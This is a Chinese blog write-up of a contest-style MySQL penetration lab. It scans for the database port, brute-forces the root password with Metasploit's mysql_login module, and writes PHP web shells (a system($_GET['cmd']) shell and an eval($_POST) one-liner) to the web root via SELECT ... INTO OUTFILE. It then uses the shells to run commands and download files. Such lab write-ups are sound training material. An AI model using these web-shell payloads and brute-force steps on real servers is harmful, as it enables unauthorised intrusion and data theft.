MYSQL数据库安全测试

已于 2023-04-22 19:43:41 修改
阅读量422 收藏 5
点赞数
文章标签: mysql php 数据库 安全
于 2023-04-22 17:56:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51957047/article/details/130307817
版权

1.利用渗透机场景kali中的工具确定MySQL的端口,将MySQL端口作为Flag提交;

Nmap -sV -p- 172.16.101.243

在这里插入图片描述
flag{3358}

2.管理者曾在web界面登陆数据库,并执行了
{select ‘<?php echo ';system($_GET[\'cmd\']); echo '; ?>’ INTO OUTFILE ‘C:/phpstudy/test1.php’}
语句,结合本执行语句使用dos命令查看服务器的详细配置信息,并将服务器的系统型号作为Flag提交;

http://172.16.101.243:8081/test1.php?cmd=systeminfo

在这里插入图片描述
flag{Bochs}

3.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将破解MySQL的密码所需的模块当作Flag提交(账户为root);

use auxiliary/scanner/msql/mysql_login
set RHOSTS 172.16.101.243 设置靶机ip
set USERNAME root 用户
root set PASS_FILE /root/password.txt 密码字典
set RPORT 3358 靶机mysql端口

在这里插入图片描述
在这里插入图片描述

flag{mysql_login}

4.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将MySQL的密码当作Flag提交(账户为root);

flag{zxcvbnm}

5.利用上题中的数据库账户密码在登陆数据库,通过select ‘<?php @eval($_POST[admin]);?>’************ 'C:/phpstudy/shell.php’语句向服务器提交名为shell.php的一句话木马,将语句中*号的明文作为Flag提交(*为大写字母或者空格);

mysql -h 172.16.101.243 -P 3358 -u root -p 登录mysql

在这里插入图片描述
select ‘<?php @eval($_POST[ad,om]);?>’ INTO OUTFILE ‘C:/phpstudy/shell.php’;

在这里插入图片描述
flag{INTO OUTFILE}

6.使用菜刀连接上题中的shell.php,下载服务器根目录下的压缩包,将压缩包中的Flag提交;

菜刀连接,下载flag.zip
在这里插入图片描述

flag{huaixiaohai}

Eglike
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
mysql安全性试验_Mysql安全性测试
weixin_30486919的博客
02-09 372
一、没有进行预处理的SQL语句
Mysql安全性测试
12-14
一、没有进行预处理的SQL语句   <?php   // 1.连接数据库   $conn = mysql_connect('127.0.0.1:3306', 'root', '518666');   if (!$conn)   {   die("Could not connect:" . mysql_error());   }   // 2.选择数据库   mysql_select_db('mysql_safe', $conn);   // 3.设置编码,注意这里是utf8而不是utf-8,如果写后者,MySQL不会识别的,会出现乱码的。   mysql_query("S
mysql数据库安全测试_MySQL数据库安全解决方案
weixin_35969301的博客
02-02 405
随着网络的普及,基于网络的应用也越来越多。网络数据库就是其中之一。通过一台或几台服务器可以为很多客户提供服务,这种方式给人们带来了很多方便,但也给不法分子造成了可乘之机。由于数据都是通过网络传输的,这就可以在传输的过程中被截获,或者通过非常手段进入数据库。由于以上原因,数据库安全就显得十分重要。因此,本文就以上问题讨论了MySQL数据库在网络安全方面的一些功能。帐户安全帐户是MySQL最简单的安全...
【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程
08-06 2485
【kali-漏洞利用】应用渗透攻击过程
MySQL数据库安全测试
d59hao的博客
05-11 249
Mysql管理工具有多种,比如phpMyAdmin网站管理系统,Navicat for MySQL以及MysqlFront等客户端工具。这些工具有的会直接保存配置信息,这些信息包含数据库服务器地址和数据库用户名以及密码,通过嗅探或者破解配置文件可以获取密码等信息。
mysql数据库测试报告
07-28
mysql数据库测试报告,mysql数据库测试报告,mysql数据库测试报告
MySQL数据库安全设置与注意事项小结
09-10
MySQL数据库安全设置是确保系统和数据安全的重要环节。在安装MySQL之后,必须立即加强安全配置,防止未经授权的访问。以下是一些关键的步骤和注意事项: 1. **设置root用户密码**:MySQL安装后,默认的root用户...
MySQL官方测试数据库
03-23
MySQL官方测试数据库是一个非常有价值的资源,对于学习和测试MySQL数据库管理系统的用户来说是不可或缺的工具。这个数据库包含了大量的数据记录,可能涉及多个表,旨在帮助用户进行实际操作练习,了解SQL查询、...
达梦与mysql测试数据库表及测试数据
05-19
在“mysql测试数据.7z”这个文件中,可能包含预设的测试表结构、示例数据和测试脚本,用于验证MySQL数据库的正确性和性能。 接着,我们来看达梦数据库。达梦数据库是国产的一款高性能、安全数据库产品,尤其适用...
pbootcms数据sqlite转mysql数据库
08-14
6. **测试与验证**:确保所有数据都成功导入并且应用程序能够正常连接到新的MySQL数据库,进行必要的功能测试以验证数据的完整性和一致性。 **关键知识点:** 1. **数据类型映射**:SQLite和MySQL的数据类型不尽...
Mysql等保2.0测评
hunanjiushen的博客
01-31 4441
1、是否对用户进行角色划分且只授予账号必须的权限,除root外,任何用户不应该有mysql库user表的存取权限,禁止将fil、process、1、查看root用户是否被删除或者重命名,不修改需要增加口令复杂度,避免空口令弱口令出现。2、访谈管理员并核查访问控制粒度主体是否为用户级,客体是否为数据库表级,基本都满足。2、查看用户权限表,并验证用户是否具有自身角色外的其他用户的权限。2、询问管理员是否不同用户采用不同账户登录,避免共享账户的存在。1、使用命令查看,是否为登录的用户创建了不同账户和权限。
2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(6)解析
PushSafe
05-27 731
2021年全国职业院校技能大赛(中职组) 网络安全竞赛试题 (6) (总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全加固 3
Web渗透测试
旺仔Sec&blog
11-23 2270
任务环境说明: 服务器场景: 服务器场景操作系统:未知(封闭靶机) 将PHP的版本号作为Flag值提交;(例如:5.2.14) 将MySQL数据库的版本号作为Flag值提交;(例如:5.0.22) 将系统的内核版本号作为Flag值提交;(例如:2.6.18) 将网站后台管理员admin用户的密码作为Flag值提交; 将/root目录中txt文件的内容作为Flag值提交。 ...
2021年中职“网络安全“江西省赛题—B-8:Web渗透测试 2022年中职组“网络安全”赛项吉安市竞赛B-1:数据库服务渗透测试
qq_61988806的博客
03-02 1571
2021年中职“网络安全“江西省赛题—B-8:Web渗透测试 2022年中职组“网络安全”赛项吉安市竞赛B-1:数据库服务渗透测试
mysql安全检测包括哪些方面_MySQL基础的安全设置包括哪些?
weixin_39518002的博客
01-18 171
MySQL软件所提供的权限32313133353236313431303231363533e59b9ee7ad9431333433643763(mysql.user、mysql.db、mysql.host)(1) 系统表mysql.useruser权限表中字段分为四类: 用户字段、权限字段、安全字段和资源控制字段。用户字段用户字段.png权限字段权限字段.png安全字段安全字段.png# 查看是否...
mysql语句安全性_Mysql安全性测试
weixin_39533896的博客
01-19 267
一、没有进行预处理的SQL语句// 1.连接数据库$conn = mysql_connect('127.0.0.1:3306', 'root', '518666');if (!$conn){die("Could not connect:" . mysql_error());}// 2.选择数据库mysql_select_db('mysql_safe', $conn);// 3.设置编码,注意这里是...
mysql一些安全措施,过等保用到?
q496427196的博客
10-31 2192
问题A:应启用登录失败处理功能,可采取结束会话、限制非法登录次数和自动退出等措施。 解决A: 1.下载地址:https://dev.mysql.com/downloads/mysql/5.7.html#downloads 下载后: 2.可以把解压的内容随便放到一个目录,我的是如下目录(放到C盘的话,可能在修改ini文件时涉及权限问题,之后我就改放D盘了): D:\MySQL\MySQL...
kali开启mysql_kali 虚拟机开启mysql:3306 供主机访问.
weixin_39622568的博客
01-19 856
mysql -u root -puse mysql;update user set host='ip' where user='root'; //更新访问权限flush privileges; //更新数据库/etc/init.d/mysql stop //停止服务/etc/init.d/mysql start //开启服务关闭linux防火墙.安装:apt-get install ufw关闭...
linux下mysql 查看默认端口号与修改端口号方法
热门推荐
此刻的丶的博客
03-24 4万+
一、查看默认端口号1、登录mysql[root@localhost ~]# mysql -uroot -pEnter password: 输入数据库密码;2、使用show global variables like 'port'; 命令查看端口号,mysql&gt; show global variables like 'port';+---------------+-------+| Varia...
mysql数据库安全策略
最新发布
04-12
MySQL数据库安全策略是确保数据库的机密性、完整性和可用性的一系列措施。以下是一些常见的MySQL数据库安全策略: 1. 强密码策略:使用复杂、长且随机的密码,并定期更换密码。避免使用默认或常用密码。 2. 用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Eglike

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值